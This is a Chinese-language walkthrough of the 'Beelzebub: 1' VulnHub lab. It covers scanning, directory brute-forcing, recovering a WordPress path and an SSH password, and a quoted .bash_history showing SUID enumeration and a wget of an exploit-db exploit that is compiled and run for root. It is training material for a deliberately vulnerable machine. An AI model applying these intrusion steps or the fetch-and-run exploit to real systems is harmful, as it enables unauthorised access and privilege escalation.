- 英文名稱:BEELZEBUB: 1
- 中文名稱:别西蔔:1
- 釋出日期:2021 年 9 月 8 日
- 難度:容易
- 描述:您必須盡可能多地枚舉,并且不要忘記 Base64。
- 下載下傳位址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
網絡安全優秀回答者
網絡安全碩士
去咨詢
1、開機資訊,知道使用者名(krampus)
開機資訊
2、主機發現(192.168.199.146)
主機發現
3、端口掃描(22、80端口)
端口掃描
4、檢視web頁面
web頁面
5、掃描目錄
dirb http://192.168.199.146/
或
dirsearch -u http://192.168.199.146/
掃描目錄
6、通路index首頁
index首頁
檢視index首頁源代碼,得到線索
<!--My heart was encrypted, "beelzebub" somehow hacked and decoded it.-md5-->
index首頁源代碼
7、對 beelzebub 進行md5計算處理
└─# echo -n 'beelzebub'|md5sum|cut -d ' ' -f1
d18e1e22becbd915b45e0e655429d487
md5計算
8、嘗試通路連結,被301重定向
疑似wordpress站點
9、嘗試周遊目錄,可以确定就是wordpress站點
dirsearch -u http://192.168.199.146/d18e1e22becbd915b45e0e655429d487/
周遊目錄
10、嘗試通路uploads
uploads
點選 talk to valak
簽訂契約的人有時會試圖智取魔鬼,但最終還是失敗了。
talk to valak
11、嘗試burp分析,拿到密碼 M4k3Ad3a1
burp分析
12、嘗試ssh登入
ssh登入
13、成功獲得普通使用者flag
普通flag
14、挖掘線索(.bash_history)
krampus@beelzebub:~$ ls -la
total 104
drwsrwxrwx 17 krampus krampus 4096 Mar 20 2021 .
drwxr-xr-x 3 root root 4096 Mar 16 2021 ..
-rw------- 1 krampus krampus 1407 Mar 20 2021 .bash_history
drwx------ 11 krampus krampus 4096 Mar 20 2021 .cache
drwxrwxrwx 14 krampus krampus 4096 May 26 2020 .config
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .dbus
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Desktop
drwxrwxrwx 2 krampus krampus 4096 Apr 8 2020 Documents
drwxrwxrwx 2 krampus krampus 4096 Mar 19 2021 Downloads
drwxrwxrwx 3 krampus krampus 4096 Oct 20 2019 .gnupg
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 .gvfs
-rwxrwxrwx 1 krampus krampus 12844 Mar 20 2021 .ICEauthority
drwxr-xr-x 3 krampus krampus 4096 Mar 19 2021 .local
drwxrwxrwx 5 krampus krampus 4096 Apr 2 2020 .mozilla
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Music
drwxrwxrwx 2 krampus krampus 4096 Oct 21 2019 Pictures
-rwxrwxrwx 1 krampus krampus 807 Oct 20 2019 .profile
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Public
-rwxrwxrwx 1 krampus krampus 66 Oct 20 2019 .selected_editor
-rw-rw-r-- 1 krampus krampus 83 May 26 2020 .Serv-U-Tray.conf
-rwxrwxrwx 1 krampus krampus 0 Oct 20 2019 .sudo_as_admin_successful
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Templates
drwxrwxrwx 2 krampus krampus 4096 Oct 20 2019 Videos
-rw-rw-r-- 1 krampus krampus 173 Mar 20 2021 .wget-hsts
15、檢視曆史記錄
krampus@beelzebub:~$ cat .bash_history
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
chmod 0750 html/
ifconfig
cd /var/lib/mysql/
clear
ls
cd wordpress/
sudo su
su root
clear
ls
cd Desktop/
clear
ls
cat user.txt
clear
uname -a
sudo -1
sudo -i
clear
uname -a
sudo -i
find / -prem -u=s -type f 2>/dev/null
find / -prem -u=s -type f 2>/dev/null
cat /etc/issue
sudo -l
cd
cd ../
cd ../../../../
clear
find / -prem -u=s -type f 2>/dev/null
cd /usr/local/Serv-U/
ls
cd
clear
ps -aux
ps -a
ps -a -U root
ps -a -U root | grep 'Serv'
ps -U root -au
ps -U root -au | sort -u
clear
cd /tmp/
clear
find / -prem -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
clear
find / -perm -u=s -type f 2>/dev/null
clear
wget https://www.exploit-db.com/download/47009
clear
ls
clear
mv 47009 ./exploit.c
gcc exploit.c -o exploit
./exploit
cd ../../../../../../../
ls
cd cd
cd
grep -r 'beelzebub'
grep -r 'love'
cd .local/share
clear
ls
cd Trash/
ls
cat info
cd info
ls
ls -la
cd ../
clear
cd ../
ls
rm -rf Trash/
clear
su root
history -R
history -r
mysql -u root -p
clear
su root
clear
lks
ls
clear
nano /etc/host
nano /etc/hosts
su root
su root
rm -rf sudo-1.9.6p1 sudo-1.9.6p1.tar.gz wordpress-5.3.2.zip
su root
clear
exit
history
clear
cd
clear
ip link
su root
clear
ls
history
clear
ls
cd /tmp/
ls
su root
exit
clear
16、根據 .bash_history 中的提示,完成提權,獲得root的flag
複現
到此,實驗完成~
釋出于 2022-08-22 21:46